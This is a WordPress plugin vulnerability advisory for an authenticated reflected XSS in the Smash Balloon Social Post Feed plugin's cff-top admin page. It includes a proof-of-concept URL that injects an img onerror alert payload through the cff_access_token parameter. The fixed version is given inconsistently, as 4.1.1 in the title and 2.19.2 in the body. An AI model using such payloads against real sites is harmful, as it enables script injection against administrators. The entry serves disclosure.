WordPress Plugin Vulnerabilities
Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting (XSS)
Description
The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page.
Proof of Concept
http://127.0.0.1:8001/wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%281%29%3E&cff_final_response=true
Affects Plugins
Fixed in version 2.19.2
References
Classification
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
Timeline
Publicly Published
2021-12-16 (about 9 months ago)
Added
2021-12-16 (about 9 months ago)
Last Updated
2022-04-08 (about 5 months ago)